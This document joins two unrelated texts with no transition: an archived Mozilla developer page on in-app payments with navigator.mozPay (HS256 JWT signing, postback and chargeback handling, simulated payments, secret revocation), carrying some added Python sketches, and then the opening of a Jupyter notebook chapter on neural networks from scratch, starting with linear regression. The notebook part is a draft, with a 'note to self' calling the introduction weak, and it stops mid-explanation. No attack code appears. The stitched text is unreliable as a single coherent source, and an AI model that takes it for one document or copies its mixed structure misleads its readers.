- w is a slope parameter.
- b is our intercept parameter.
- Implicit in the model is the fact that we have transformed y by another function, the "identity" function, f(x) = x.
In this model, y and x are, in a sense, "fixed", because this is the data that we have obtained. On the other hand, w and b are the parameters of interest, and we are interested in learning the parameter values for w and b that let our model best explain the data.
Make Simulated Data
To explore this idea in a bit more depth as applied to a linear regression model, let us start by making some simulated data with a bit of injected noise.
Exercise: Simulate Data
Fill in
w_true and
b_true with values that you like, or else leave them alone and follow along.
from dl_workshop.answers import x, w_true, b_true, noise # exercise: specify ground truth w as w_true. # w_true = ... # exercise: specify ground truth b as b_true # b_true = ... # exercise: write a function to return the linear equation def make_y(x, w, b): """Your answer here.""" return None # Comment out my answer below so it doesn't clobber over yours. from dl_workshop.answers import make_y y = make_y(x, w_true, b_true) # Plot ground truth data plt.scatter(x, y) plt.xlabel('x') plt.ylabel(.)
Exercise: Take bad guesses
Now, let's plot what would be a very bad estimate of w and b.
Replace the values assigned to
w and
b with something of your preference,
or feel free to leave them alone and go on.
# Plot a very bad estimate w = -5 # exercise: fill in a bad value for w b = 3 # exercise: fill in a bad value for b y_est = w * x + b # exercise: fill in the equation. plt.plot(x, y_est, color='red', label='bad model') plt.scatter(x, y, label='data') plt.xlabel('x') plt.ylabel('y') plt.legend();
Regression Loss Function
How bad is our model? We can quantify this by looking at a metric called the "mean squared error". The mean squared error is defined as "the average of the sum of squared errors".
"Mean squared error" is but one of many loss functions that are available in deep learning frameworks. It is commonly used for regression tasks.
Loss functions are designed to quantify how bad our model is in predicting the data.
Exercise: Mean Squared Error
Implement the mean squred error function in NumPy code.
def mse(y_true: np.ndarray, y_pred: np.ndarray) -> float: """Implement the function here""" from dl_workshop.answers import mse # Calculate the mean squared error between print(mse(y, y_est))
702.42755
Activity: Optimize model by hand.
Now, we're going to optimize this model by hand. If you're viewing this on the website, I'd encourage you to launch a binder session to play around!
import pandas as pd from ipywidgets import interact, FloatSlider import seaborn as sns @interact(w=FloatSlider(value=0, min=-10, max=10), b=FloatSlider(value=0, min=-10, max=30)) def plot_model(w, b): y_est = w * x + b plt.scatter(x, y) plt.plot(x, y_est) plt.title(f"MSE: {mse(y, y_est):.2f}") sns.despine()
Loss Minimization
As you were optimizing the model, notice what happens to the mean squared error score: it goes down!
Implicit in what you were doing is gradient-based optimization. As a "human" doing the optimization, you were aware that you needed to move the sliders for w and b in particular directions in order to get a best-fit model. The thing we'd like to learn how to do now is to get a computer to automatically perform this procedure. Let's see how to make that happen. | https://ericmjl.github.io/dl-workshop/01-differential-programming/01-neural-nets-from-scratch.html | CC-MAIN-2022-33 | refinedweb | 957 | 65.73 |
I'm developing an ICN plugin with a PluginResponseFilter. The structure of my plugin looks like this:
public class FilterPlugin extends Plugin { @Override public String getId() { return "FilterPlugin"; } @Override public String getName(Locale locale) { return "Filter Plugin"; } @Override public String getVersion() { return "1.0"; } @Override public PluginResponseFilter[] getResponseFilters() { return new PluginResponseFilter[] { new Filter() }; } @Override public String getConfigurationDijitClass() { return "myCompany/ConfigurationPane"; } }
If I load this plugin in Content Navigator, it loads just fine, with the exception of an HTTP request to.
ViewerPlugin is the ID of another plugin I developed, but uninstalled a while ago. When I open I get the source code of my Dojo module. This isn't the first time I get the invalid call to the
ViewerPlugin resource, so I suspect Content Navigator cached it and used it ever since. I tried restarting Content Navigator, but that didn't change anything.
Answer by Calvin_Zhang (671) | Apr 27, 2018 at 08:16 PM
Hi,
It may be cached by the browser. Every time the javascript file changed, the browser cache may need to be cleared.
There are 2 ways to load the plugin. One is for class files and one is for jar file. For jar file loading, it needs to be loaded and saved again after change, and also need to reload the whole ICN web page. For class file mode, just need to reload the whole ICN web page and make the change effective.
But the js file and html file change still need to clear the browser cache.
Answer by jase_kross (236) | May 03, 2019 at 05:03 PM
What version of ICN is the plugin loaded into?
Do you have the ability to select individual plugins for the affected desktop? In older versions of ICN all plugins are loaded by default. If you happen to be running one of these versions it may be possible that the desktop is loading a cached ICN database reference to the plugin.
When you loaded the replacement plugin did you overwrite the old one or did you go through the steps to physically delete the plugin via the ICN Administration tool and then create a new plugin and load the jar? If you loaded the plugin over the existing plugin it would create a new plugin entry with a different id and wouldn't remove the old plugin entry from the ICN database. Thus you wouldn't see two different plugins, only the newer plugin. If this is the case you can clean it up by removing the newer plugin then reloading the old plugin before removing it again and finally adding the newer plugin.
156 people are following this question.
Why does callbacks.getP8ObjectStore() return null when called from the Admin desktop? 2 Answers
Calling ICN plugin service from other web app 1 Answer
How can you print all documents, that you get as result of a search ? 1 Answer
icn plugin how to upload file to plugin service? 2 Answers
RAD9.5 , RAD9.6 and ICN 3.0 - any plans for updated JARS? 1 Answer | https://developer.ibm.com/answers/questions/444942/$%7BawardType.awardUrl%7D/ | CC-MAIN-2020-05 | refinedweb | 509 | 63.19 |
Add lines to indicator
Imagine indicator that loads news from data sources list, which was passed by
params. List length is variable.
Now how to add dynamically lines to indicator?
You cannot dynamically add lines. Not because it cannot be done, because the code filling the lines would also have to be changed dynamically and the number of lines would change along the datetime axis.
Ok then is it possible to hide and rename lines? Thus one can add 10 lines with pretty generic names, then hide not necessary one and rename visible?
It seems you are concerned about plotting those lines because you specifically say
hideand thus the assumption that the same applies to
rename.
You can change the
plotlinesinformation for any line.
See Docs - Plotting and specifically the section Line specific plotting options. The
plotlinesinformation can be changed in a live instance.
From
Stochasticfor example
lines = ('percK', 'percD',) ... plotlines = dict(percD=dict(_name='%D', ls='--'), percK=dict(_name='%K'))
Used because
%is not an allowed character in identifiers. And from the
DrawDownobserver
lines = ('drawdown', 'maxdrawdown',) ... plotlines = dict(maxdrawdown=dict(_plotskip=True,))
Here and in other indicators plotlines are static defined. Is
_plotinitright place to redefine it?
Definition only happens when the class is created. At any other time including
_plotinit, things happen in instances and there you can only change the values of the already defined things.
Got it too.
Last question: how to reach exact plotline in loop, not calling it by name? I.e. not like this
self.plotlines.<line_name>._name = 'new'
Studying
AutoInfoClass...
You cannot. What you can do is name the lines sequentially and then access them sequentially.
Could you provide code snippet please?
- backtrader administrators
Standard python ...
lines = ('line1', ..., 'lineX') plotlines = dict( line1=dict(...), ... lineX = dict(...), )
for i in range(1, X + 1): plotline = getattr(self.plotlines, 'line' + i) # do something with the plotline
Thank you for all replies and code snippets.
Here is the beauty:
I suggest you to add options to hide some text to make data cleaner - see red rectangles on image:
- Indicator parameters list;
- Line last value.
Whatever is shown after the name of the indicator can be controlled. See the following excerpt from
RSI:
def _plotlabel(self): plabels = [self.p.period] plabels += [self.p.movav] * self.p.notdefault('movav') return plabels
The method returns a list of strings, with one special provision to use the name of some classes as the text label to automatically support using other indicators.
Thanks!
It's much cleaner now:
Dreaming of
disable showing last valuefeature.
Both
_plotlabeland
_plotinithave now been documented under Docs - Plotting
Am I missing something or there is not option to reach (cancel) this code in
Plot_OldSync.plotind()?
if not math.isnan(lplot[-1]): label += ' %.2f' % lplot[-1]
backtrader is not the 1st platform to plot ... and a common pattern is to plot the last value of the indicator. So far no option to disable it.
This was anyhow not a breaking change, so the
developmentbranch contains now
Control over the last value after the name of the object
- Global:
linevalues(as option to
plotor in a
PlotSchemeinstance)
- Per-object:
plotinfo.plotlinevalues
- Per-line (for indicators/observers):
_plotvalue
Control over the right hand side tag on lines:
- Global:
valuetags(as option to
plotor in a
PlotSchemeinstance)
- Per-object:
plotinfo.plotvaluetags
- Per-line (for indicators/observers):
_plotvaluetag
Part of the small release 1.9.38.116 and added to the plotting documentation
In my particular case
line._plotvalue = False
helps.
Thanks for flexible solution! | https://community.backtrader.com/topic/294/add-lines-to-indicator | CC-MAIN-2017-51 | refinedweb | 584 | 59.4 |
February 15, 2022 • ☕️ 1 min read
After a lot of struggling with getting chalk to work with TypeScript I finally found (in the documentation) that you should just use version 4 of chalk! In the release notes it is stated that:
If you use TypeScript, you will want to stay on Chalk 4 until TypeScript 4.6 is out.
I can now use chalk as follows from TypeScript:
import chalk from "chalk"; console.log(chalk.red("This is red"));
Next problem: color output is stripped when using Lerna.
If you run
lerna run doit --scope mypackage --stream all color output is stripped.
To fix this set the environment variable
FORCE_COLOR=1.
For example in an npm script do the following:
... "run_doit_in_package_mypackage": "cross-env FORCE_COLOR=1 lerna run doit --scope mypackage --stream" ... | https://www.sergevandenoever.nl/chalk-typescript-lerna/ | CC-MAIN-2022-33 | refinedweb | 131 | 74.49 |
On Tue, Apr 17, 2012 at 22:46, Alain Tschanz <atschanz@...> wrote:
> I need to change the look of the DSpace front page (version 1.8.1; Manakin).
> I would like to remove “Communities in DSpace” block and add “Advanced
> Search” underneath “Search DSpace” block. Can anybody tell
> me how to accomplish those two things?
Here's how you remove the Browse block:
<xsl:template
</xsl:template>
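A fuller version of that override in a Mirage theme is an empty template matched on the community-browser div. The id below is the usual stock one (note DSpace's historical one-"m" spelling of "comunity"); verify it against your own page's DRI source:

```xsl
<!-- produce no output for the front-page "Communities in DSpace" block -->
<xsl:template match="dri:div[@id='aspect.artifactbrowser.CommunityBrowser.div.comunity-browser']">
</xsl:template>
```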
Regarding adding Advanced search, what exactly would you like to do?
1) Add a link called "Advanced search" or the form itself?
2) Do you mean Search DSpace in the right-hand menu or under
Communities in DSpace?
3) Do you have Discovery enabled?
Regards,
~~helix84
Hi Jose,
I believe this is not a problem and that the only way to influence
processing of mets or dim based on DRI is to save state in a variable
when in DRI and use the variable in mets/dim. Consider this:
<!-- here we are processing DRI -->
<xsl:variable<xsl:value-of
select="/dri:document/dri:meta/dri:pageMeta/dri:metadata[@element='focus'
and @qualifier='container']"/></xsl:variable>
<!-- Generate the info about the item from the metadata section -->
<xsl:template
<!-- here we are processing DIM -->
<table class="ds-includeSet-table">
<xsl:choose>
<xsl:when
<xsl:call-template
</xsl:when>
<xsl:otherwise>
<xsl:call-template
</xsl:otherwise>
</xsl:choose>
</table>
</xsl:template>
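Spelled out with concrete names — the variable name, the handle being tested, and the two called templates below are invented for illustration — the pattern looks like this:

```xsl
<!-- DRI pass: save the container the page is focused on into a global variable -->
<xsl:variable name="focusContainer">
    <xsl:value-of select="/dri:document/dri:meta/dri:pageMeta/dri:metadata[@element='focus' and @qualifier='container']"/>
</xsl:variable>

<!-- DIM pass: branch on the value captured from the DRI document -->
<xsl:template match="dim:dim" mode="itemSummaryView-DIM">
    <table class="ds-includeSet-table">
        <xsl:choose>
            <xsl:when test="contains($focusContainer, '123456789/42')">
                <xsl:call-template name="special-collection-summary"/>
            </xsl:when>
            <xsl:otherwise>
                <xsl:call-template name="default-summary"/>
            </xsl:otherwise>
        </xsl:choose>
    </table>
</xsl:template>
```

The global variable is evaluated once against the main (DRI) source document, which is why it is still available later while templates are processing the METS/DIM nodes.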
I haven't run into a problem with this. That being said, if anyone has
an alternative suggestion, I'd be interested to hear it.
Regards,
~~helix84
Hello,
I need to change the look of the DSpace front page (version 1.8.1; Manakin). I would like to remove "Communities in DSpace" block and add "Advanced Search" underneath "Search DSpace" block. Can anybody tell me how to accomplish those two things?
Thank you.
Alain
I'm using the Mirage theme and would like to add some logic to
<xsl:template
in item-view.xsl, based on a flag I have added to the DRI XML. Is there a way to do this? Is it better to add the flag to the METS XML file? Would that not violate the METS namespace?
Thank you!
Jose
Hi Sue,
to answer your first question, I'll refer you to my previous post:
Your second question was about metadata field labels - you can define
them in [dspace]/webapps/xmlui/i18n/messages.xml. Just add a new one
at the bottom, and you can use it in your XSL with the <i18n:text> tags.
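For example (the message key below is invented; any unique key works):

```xml
<!-- in [dspace]/webapps/xmlui/i18n/messages.xml: add the label near the bottom -->
<message key="xmlui.mytheme.item.advisor">Advisor</message>

<!-- in your theme's XSL: emit the translated label -->
<i18n:text>xmlui.mytheme.item.advisor</i18n:text>
```

Note that the i18n namespace (xmlns:i18n="http://apache.org/cocoon/i18n/2.1") must be declared on the stylesheet for <i18n:text> to be expanded.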
Let me know if you need more details.
Regards,
~~helix84
Hi,
We've just finished implementing a test version of Manakin/XMLUI in one of our test DSpace instances, but I can't find any documentation on how to configure which fields display on your short listing for each collection, or where to define the labels for each metadata field. Can someone help me out with this? I tried to do it the same way it works in JSPUI, but couldn't get it to work.
Thanks in advance,
Sue
Sue Walker-Thornton
Software Developer/Database Administrator
NASA Langley Research Center - LITES Contract
susan.m.thornton@...
(W) 757-864-2368
(M) 757-506-9903
Hello,
Unfortunately, it's not clear exactly what you want to customize with
DSpace and which parts of the documentation you have questions on.
Providing us with more specific questions will allow us to better help you.
Without specific questions, all we can provide you with are general
customizations resources.
There are customization details in the 1.8 Documentation:
* JSPUI Customization:
* XMLUI (aka Manakin) Customization:
* General Configuration:
We also have many "how-to" guides (written by other DSpace users)
available on our Wiki. These often provide more specific examples of how
to perform a customization task with DSpace.
*
Finally, there are additional guides available / linked off our wiki
that provide additional help:
*
Please take a look at these resources, and let us know if you have
specific questions.
- Tim
On 4/17/2012 2:54 AM, lokesh.snghl wrote:
>.
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
>
> _______________________________________________
> DSpace-tech mailing list
> DSpace-tech@...
>
Well, I see two separate problems:
"HELO hostname". It looks like you're using a literal "hostname" for
the name of the DSpace host system and your email server doesn't like
that.
In addition, it looks like you have some unescaped nested doublequotes
that are confusing the JSP compiler.
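For reference, the mail-related settings live in dspace.cfg (all values below are placeholders). The HELO name itself, though, is taken from the machine's own hostname, so the DSpace box also needs a proper fully-qualified name:

```properties
# dspace.cfg -- SMTP settings (example values only)
mail.server = smtp.example.edu
mail.server.port = 25
mail.server.username =
mail.server.password =
mail.from.address = dspace-noreply@example.edu
mail.feedback.recipient = dspace-help@example.edu
mail.admin = dspace-admin@example.edu
```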
--
Mark H. Wood, Lead System Programmer mwood@...
Asking whether markets are efficient is like asking whether people are smart.
Sir, I have added some new browsing and searching options in the dspace.cfg
file, and after that I rebuilt the index with index-init, but no new option
appears in DSpace for searching or browsing. Please guide me: how can I add
new search or browse fields in DSpace successfully?
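For reference, in a 1.x dspace.cfg a browse index and a search index are declared roughly like this (the index names and metadata fields below are just examples). After editing, rebuild with [dspace]/bin/dspace index-init and restart the webapp:

```properties
# dspace.cfg -- example index definitions (names and fields are illustrative)

# browse index: <name>:metadata:<comma-separated fields>:<data type>
webui.browse.index.5 = advisor:metadata:dc.contributor.advisor:text

# search index: <name>:<schema.element.qualifier>
search.index.13 = advisor:dc.contributor.advisor
```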
Hi:
Do you get an error page or a blank page? If you get a blank page that
still shows your DSpace template (skin and layout), you should check your
Solr config and test the connection to it. I had this error before I knew
about the Solr stats module.
If you get an error page, check your logs (DSpace and web server).
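A quick way to test that connection is to query the statistics core directly (the port and context below are the usual defaults — adjust them to your install):

```shell
# a small XML response containing numFound means the Solr
# statistics core is reachable from this machine
curl 'http://localhost:8080/solr/statistics/select?q=*:*&rows=0'
```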
Regards
On 17/04/2012 02:04, "Abhishek Raval" <abhishek@...> wrote:
> Hello All,
>
> When I click on the "View Statistics" button on a community or
> collection page, I don't get any report. What should I do?
>
>
> --
> Thanks n Regards
> Abhishek Raval
> Ph no.-+919601077584
Hi everyone,
We're using DSpace 1.7.1 with XMLUI.
We're harvesting some collections via the OAI-PMH protocol, doing a weekly
harvest. Besides, we also have our own content, which is not harvested and
is loaded by ourselves. In addition, some institutions contribute content
to us. So, we're consumers and a source at the same time.
My question is, is there any way to serve via OAI-PMH protocol only the
collections that are loaded by ourselves (not our harvested collections)?
Thanks in advance,
Robert Ruiz.
Hello All,
I have just installed DSpace on Ubuntu 10.04.
The server runs fine. The only problem I get is "I cannot register users. It looks like the system cannot communicate with the mail server". Of course, I configured the "dspace.cfg" file correctly.
I have attached the log report in this email. Please help me.
Lazaro Luhusa
Sokoine University of Agriculture
Tanzania
Hello All,
When I click on the "View Statistics" button on a Community or
Collection page I don't get any report. What should I do?
--
Thanks n Regards
Abhishek Raval
Ph no.-+919601077584
Hi,
On 17/04/12 07:46, Brian Freels-Stendel wrote:
> My suspicion is that there's a bad interaction going on between the
> requests. If you look at the address bar, when the "page not found" is
> served, there's an "/admin" in the mix. I think the admin account's
> request is from an admin page; but logging in as another user tries to
> shunt you to either the home page or that user's page, neither of which
> are under the admin directory.
I think (but haven't looked into it) that logging in as another user
tries to keep you on an admin page -- which doesn't exist for a
non-admin user. The solution probably would be to redirect to the user's
profile page rather than staying on the current page -- somewhere in the
flowscript, presumably.
cheers,
Andrea
--
Dr Andrea Schweer
IRR Technical Specialist, ITS Information Systems
The University of Waikato, Hamilton, New Zealand | http://sourceforge.net/p/dspace/mailman/dspace-tech/?viewmonth=201204&viewday=17 | CC-MAIN-2015-32 | refinedweb | 1,310 | 65.62 |
Suppose you have a graph of a function, but you don’t have an equation for it or the data that produced it. How can you reconstruct the function?
There are a lot of software packages to digitize images. For example, Web Plot Digitizer is one you can use online. Once you have digitized the graph at a few points, you can fit a spline to the points to approximately reconstruct the function. Then as a sanity check, plot your reconstruction to see if it looks like the original. It helps to have the same aspect ratio so you’re not distracted by something that doesn’t matter, and so that differences that do matter are easier to see.
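To make the fit-then-check step concrete, here is a minimal sketch with made-up digitized points (not data from any real graph): fit an interpolating spline, then confirm it passes back through the points you digitized.

```python
import numpy as np
from scipy import interpolate

# Hypothetical (x, y) points read off a graph with a digitizer
x = np.array([0.0, 1.0, 2.0, 3.0, 4.0])
y = np.array([0.0, 0.8, 0.9, 0.1, -0.7])

# splrep interpolates by default (smoothing s=0 when no weights are given)
spline = interpolate.splrep(x, y)

# Evaluate the reconstruction on a finer grid for plotting
xnew = np.linspace(0, 4, 50)
ynew = interpolate.splev(xnew, spline)

# Sanity check: the spline reproduces the digitized points
print(np.allclose(interpolate.splev(x, spline), y))
```

If the reconstruction looks wrong when plotted against the original, the usual culprits are too few digitized points or a misread axis scale.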
For example, here is a graph from Zwicker and Fastl’s book on psychoacoustics. It contains many graphs with no data or formulas. This particular one gives the logarithmic transmission factor between free field and the peripheral hearing system.
Here’s Python code to reconstruct the functions behind these two curves.
import matplotlib.pyplot as plt
import numpy as np
from scipy import interpolate

curve_names = ["Free", "Diffuse"]
plot_styles = { "Free" : 'b-', "Diffuse" : 'g:'}

data = {}
for name in curve_names:
    data = np.loadtxt("{}.csv".format(name), delimiter=',')
    x = data[:,0]
    y = data[:,1]
    spline = interpolate.splrep(x, y)
    xnew = np.linspace(0, max(x), 100)
    ynew = interpolate.splev(xnew, spline, der=0)
    plt.plot(xnew, ynew, plot_styles[name])

logical_x_range = 24    # Bark
logical_y_range = 40    # dB
physical_x_range = 7    # inch
physical_y_range = 1.625 # inch

plt.legend(curve_names, loc=2)
plt.xlabel("critical-band rate")
plt.ylabel("attenuation")
plt.xlim((0, logical_x_range))
plt.axes().set_aspect(
    (physical_y_range/logical_y_range) / (physical_x_range/logical_x_range)
)

ax = plt.gca()
ax.get_xaxis().set_ticks([0, 4, 8, 12, 16, 20, 24])
ax.get_yaxis().set_ticks([-10, 0, 10, 20, 30])
plt.show()
Here’s the reconstructed graph.
10 thoughts on “How to digitize a graph”
Hi,
I try to run but it generates an error in line:
>>>np.loadtxt(“{}.csv”.format(name), delimiter=’,’)
No such file or directory: ‘Free.csv’
Could you suggest anything?
Thanks
It’s a reference to a data file I didn’t post online. You could digitize your own graph and use its data.
I see.
Could you add your data file to try it?
Because I don't know how to obtain a csv file from a digitized graph.
Thanks, John! That’s a useful tool.
Engauge is what I used and recommend to everyone. Easy to use, yet it has advanced features. It can also save post-processed figures for later changes or audit. WebPlotDigitizer has only a Windows offline version and does not have a continuous integration setup.
Hi John,
I have a question: did you download the graph as a .png file and then convert it to .csv?
If I remember correctly, I uploaded an image to the web site mentioned in the post and it produced a csv.
Thank you – I like the way you set up your plot parameters as well. There are many ways to “skin a cat” –or “skin a potato” if you want to use PETA phrases ;) — but this is a nice example of hard-coding the axis limits and ticks.
Also a note – the web plot digitizer has moved to
Thanks. I updated the link.
I prefer PlotDigitizer () over WebPlotDigitizer. It is better and more stable than the latter. | https://www.johndcook.com/blog/2016/04/20/how-to-digitize-a-graph/ | CC-MAIN-2022-27 | refinedweb | 553 | 68.97 |
Stoxy is a modern state management library built around creating reactive, stateful and persistent web experiences.
Stoxy allows you to easily control the global state of your application, and tap into said state when needed.
The newest addition to Stoxy is a new add-on library: Stoxy Hooks.
Stoxy Hooks are an easy way to integrate Stoxy into any React or Preact application.
Examples
Here I'll show a few simple examples of Stoxy Hooks in action
A Simple Clicker
import { useStoxy } from "@stoxy/hooks";
import React from "react";

export function Clicker() {
  const { state, update } = useStoxy(React, {
    key: "demo.counter",
    state: 0
  });

  function inc() {
    update(c => (c += 1));
  }

  return (
    <div>
      <p>Pushed {state} times</p>
      <button onClick={inc}>Click</button>
    </div>
  );
}
A Todo List
import { useStoxy } from "@stoxy/hooks";
import * as preact from "preact/hooks";

export function TodoList() {
  const { state } = useStoxy(preact, {
    key: "todo-list",
    state: { items: [] },
    init: true,
    persist: true
  });

  return (
    <ul>
      {state.items.map(item => (
        <li key={item.id}>{item.name}</li>
      ))}
    </ul>
  );
}
import { useStoxy } from '@stoxy/hooks';
import React from 'react';

export function AddToList() {
  const { add } = useStoxy(React, { key: 'todo-list' });

  function addItem(e) {
    e.preventDefault();
    const formData = new FormData(e.target);
    const taskName = formData.get('task');
    add({ created: Date.now(), name: taskName });
    const inputField = document.querySelector("input[name='task']");
    inputField.value = '';
  }

  return (
    <form onSubmit={addItem}>
      <input type="text" name="task" />
      <input type="submit" value="Add" />
    </form>
  );
}
You can easily get started using Stoxy hooks with just one quick install:
npm install @stoxy/hooks
And you're all set!
The whole Stoxy ecosystem is extremely lightweight, in package size and when writing code.
Read more about the subject on the Stoxy Website
If you like how Stoxy makes managing state simple, Join the almost 50 Stargazers on GitHub
Discussion (3)
Is Stoxy using indexedDB?
Yes! Stoxy uses IndexedDB to persist the state data, and lighten the cache on complex applications.
Read more about it here: stoxy.dev/docs/
Cool, I have been working on a similar thing for the last few weeks 🤣. I'm currently at a point where I want to make form inputs work. I see you solved it also, very nice.
An important part of building software is testing it, ensuring it works and identifying its flaws. The write-up describes a few basic aspects of testing.
A test case is an example in which the correct behavior of the software is known, generally one in which there is some expectation that some software might be incorrect.
The possible set of test cases is usually infinite, so exhaustive testing is not generally possible. Even a simple function like
len takes in a string, and there are infinitely many strings possible. Who knows if
len('d&sdf78 Zdfg ') won’t be the one case that fails, even though
len('d&sdf78 Zdff ') passed?
One option is proof: software has a mathematical basis, and it is possible to create proofs of correctness. Proofs are little used, in part because they require more mathematical expertise of the programmer, and will not be taught in this course for that reason as well. If you are interested, one of the best-known projects to contain such proofs was seL4.
More common is the adoption of a test suite, a set of test cases that we hope will discover a bug if a bug exists. Selection of tests for test suites tends to be based on analysis of equivalence classes and corner cases, along with a few other techniques we won’t cover.
To explore this more, we’ll look at the
abs function for finding absolute values.
If we assume that software was written by a normal non-malicious human, we can probably assume they did not add extra code for the purpose of making their program break in strange ways. This in turn generally means that they treat large swaths of inputs the same way. These probably-the-same swaths are called equivalence classes.
For example, if
abs(8) works then it is highly unlikely that
abs(9) will fail. This is because
positive integers is a likely equivalence class for
abs.
Equivalence classes vary by task. For example,
positive integers is probably not an equivalence class for
divided_by_2, but
even positive integers might be.
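To see why, consider one hypothetical integer-halving function (divided_by_2 is not defined in these notes; this implementation is just for illustration). Even and odd inputs take observably different paths, so they belong in separate equivalence classes:

```python
def divided_by_2(n):
    """Hypothetical implementation: integer division, rounding down."""
    return n // 2

# Even positive integers: the result is exact
print(divided_by_2(8))    # 4
print(divided_by_2(100))  # 50

# Odd positive integers: the result is rounded down, which a buggy
# implementation might get wrong -- a separate class worth testing
print(divided_by_2(9))    # 4
print(divided_by_2(101))  # 50
```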
It is good practice to try to split the entire space of inputs or arguments into equivalence classes, such as

- positive int arguments
- negative int arguments
- 0
- positive float arguments
- negative float arguments
- float arguments representing integers
- float arguments representing non-integers
- 0.0

In general, for each equivalence class you should test at least a couple of representative values, such as a simple one (abs(1)) and a more arbitrary one (abs(1138)).
Sometimes there are special cases that might behave differently than others. Examples include
abs(0),
math.tan(math.pi / 2),
len(""), etc.
You should always test all of the corner cases if you can.
Sometimes cases that should break the program are also called corner cases; for example, what should
abs("hi") return?
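A short sketch of testing corner cases for an abs-like function (my_abs here is a sample implementation for illustration, not code from the notes). A signed floating-point zero and a non-numeric argument both sit at the edges of the input space:

```python
def my_abs(x):
    if x < 0:
        return -x
    return x

# Boundary between the positive and negative classes
print(my_abs(0))       # 0

# Signed zero slips through the x < 0 test, so the sign survives
print(my_abs(-0.0))    # -0.0 (still equal to 0.0, but the sign differs)

# A case that should break: strings have no absolute value
try:
    my_abs("hi")
except TypeError:
    print("TypeError raised as expected")
```

Note that an equality test like `my_abs(-0.0) != 0.0` would not catch the signed-zero case, since -0.0 == 0.0; corner cases sometimes need sharper checks than the rest of the class.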
In Python, function names without their parentheses are just variables, and can be used to pass functions as arguments to other functions. This enables us to create functions that test other functions
def is_abs(func):
    # integers
    if func(0) != 0: return False
    if func(1) != 1: return False
    if func(1138) != 1138: return False
    if func(-1) != 1: return False
    if func(-3330) != 3330: return False
    # floating-point numbers
    if func(0.0) != 0.0: return False
    if func(-0.0001) != 0.0001: return False
    if func(0.0001) != 0.0001: return False
    ...
    return True

if is_abs(abs):
    print('built-in function abs passed all tests')
else:
    print('built-in function abs failed at least one test')

def my_abs(x):
    if x < 0:
        return -x
    return x

if is_abs(my_abs):
    print('my function my_abs passed all tests')
else:
    print('my function my_abs failed at least one test')

def bad_abs(x):
    if x < 1:
        return -x
    return x

if is_abs(bad_abs):
    print('my function bad_abs passed all tests')
else:
    print('my function bad_abs failed at least one test')
Functions that test other functions are just the first step into code that tests code; Python comes with two more advanced tools (unittest and doctest), which make use of some parts of the Python language we haven’t discussed yet, and entire companies have grown out of the need for even more advanced tools.
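As a preview, here is roughly what the same tests look like with the standard unittest module (this uses class syntax not covered here, and runs the suite directly instead of via unittest.main()):

```python
import unittest

def my_abs(x):
    if x < 0:
        return -x
    return x

class TestMyAbs(unittest.TestCase):
    def test_positive_ints(self):
        self.assertEqual(my_abs(1), 1)
        self.assertEqual(my_abs(1138), 1138)

    def test_negative_ints(self):
        self.assertEqual(my_abs(-1), 1)
        self.assertEqual(my_abs(-3330), 3330)

    def test_zero(self):
        self.assertEqual(my_abs(0), 0)

# Load and run the suite, then report the overall result
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestMyAbs)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print("all tests passed:", result.wasSuccessful())
```

Each test method covers one equivalence class, and the runner reports which methods failed, which is more informative than a single True/False from a hand-rolled checker.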
I took this example here to test out some AspectJ features.
If I put a breakpoint on the System.out line here I can hit it just fine.
@Aspect
public class TestAspect {
@Before("execution (* com.aspectj.TestTarget.test*(..))")
public void advice(JoinPoint joinPoint) {
System.out.printf("TestAspect.advice() called on '%s'%n", joinPoint);
}
}
However, if I change it to an @Around joinpoint the breakpoint is not hit but the console shows that the code in the joinpoint was run.
@Around("execution (* com.aspectj.TestTarget.test*(..))")
public Object advice(ProceedingJoinPoint invocation) throws Throwable {
System.out.printf("Around TestAspect.advice() called on '%s'%n", invocation);
return null;
}
Is there a reason why the @Around advice is not hit? It doesn't get hit in Eclipse either.
Decompiling the bytecode shows that in the latter case the advice is inlined as a synthetic method in the TestTarget class, so the actual TestAspect.advice() method is never executed.
Hi, I’m new and I want to know if there is a better way to learn MonoGame.
P.S. I’m sorry if I expressed myself badly, but I’m still learning English.
By “better way” what do you mean?
Also, there are plenty of ways you can learn MonoGame. You can start by reading the tutorials in the documentation, or by watching XNA video tutorials; it's the same thing, though.
P.S: Learning english too.
Hi
Better than what?
Look for XNA tutorials on Google; it is the same sort of thing. You should find one that fits your needs (Riemer's, for example).
Unfortunately, you have asked a very prescient question that the game development community has yet to provide a cognizant answer for.
Despite the many tools available and some of the excellent tutorials and documents that go along with these tools, game development is still pretty much a Black Art.
It remains so, much as CICS or communications programming did in the age of the mainframe era (of which I came out of) so that only a small group of professional developers could command very high salaries.
This aspiration is not really the same for game development but the end result is the same; only a small, select group in this aspect of the IT industry manage to get to the top of the ladder and are able to produce games that command a good revenue stream. Whether this is intentional or not is not known but may be more of a result of the inherent difficulties in learning to develop a game programmatically and well than anything else, along with the length of time it takes to develop a really high quality game
It has taken me years of research, time, and effort just for me to be able to develop the project I am currently working on and produce the technical articles that I offer on this forum for people who are interested in the type of game development I am pursuing (military simulation/war-game). And a lot of this effort has been allayed by my professional responsibilities when I was working in the corporate environments.
Based on all this here is what I can suggest…
First, research carefully the type of game you are interested in developing since each game type has different requirements and techniques for its development.
There is no one size that fits all in game development except at the most basic levels. However, game development environments like Unity attempt to provide a level of seamless integration between game genres.
Next, begin to learn just the basics for getting graphics on the screen with MonoGame. Tinker with simple primitive drawings and animations, all of which can be found in many basic tutorials for XNA, which are still around and quite prevalent. Books on XNA are still readily available on Amazon.
And since MonoGame is merely a reflection of the basic XNA namespaces and APIs (but slowly becoming far more advanced), you will have no trouble working with MonoGame using XNA constructs.
Once you feel comfortable working with basic graphic technologies in MonoGame you can then begin to branch out and begin researching and studying the techniques for the type of game design you are interested in building. Aerial simulations and war-game development are two of the most complex game development projects you can endeavor to build since the research material is scant and spread out all over the place, not because there is some unique attribute that makes such development any harder than a programmed First Person Shooter.
By the way for aerial simulation you will need to know advanced mathematics such as physics. Some of the most advanced of these types of simulations are Rise of Flight (WWI), IL2-Sturmovik (WWII), and Digital Combat Simulator (DCS), the latter which covers multiple periods. However, if this is your interest than these are the standards to set your aspirations to.
First Person Shooters and Adventure Games are somewhat easier to develop. Again, not because they are inherently easier to develop but because of their popularity there is quite a bit more information available on the various techniques used to support such development.
2D Side-Scrollers and such games as Tetris clones are probably the easiest types of games to develop simply because so many tutorials provide examples on how to program them.
Once you decide on the game type you want to work with, stick with it because the research will be long and arduous.
